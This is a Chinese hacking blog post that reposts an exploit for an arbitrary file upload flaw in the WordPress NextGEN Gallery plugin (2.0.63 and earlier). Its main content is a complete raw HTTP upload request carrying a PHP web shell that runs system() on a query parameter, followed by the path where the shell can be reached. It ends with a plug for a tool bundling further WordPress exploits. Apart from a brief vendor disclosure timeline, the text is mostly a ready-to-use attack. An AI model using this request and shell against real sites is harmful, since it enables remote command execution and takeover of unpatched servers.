注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[php]Wordpress NextGEN Gallery Plugin 2.0.63 文件上传漏洞  

2015-04-25 02:52:08|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------


Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM



Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------2427186578189
Content-Disposition: form-data; name="name"

cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>


The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php

[神器]K8飞刀20150425 新增10个Wordpress漏洞EXP
http://qqhack8.blog.163.com/blog/static/114147985201532521135461/
  评论这张
 
阅读(1489)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016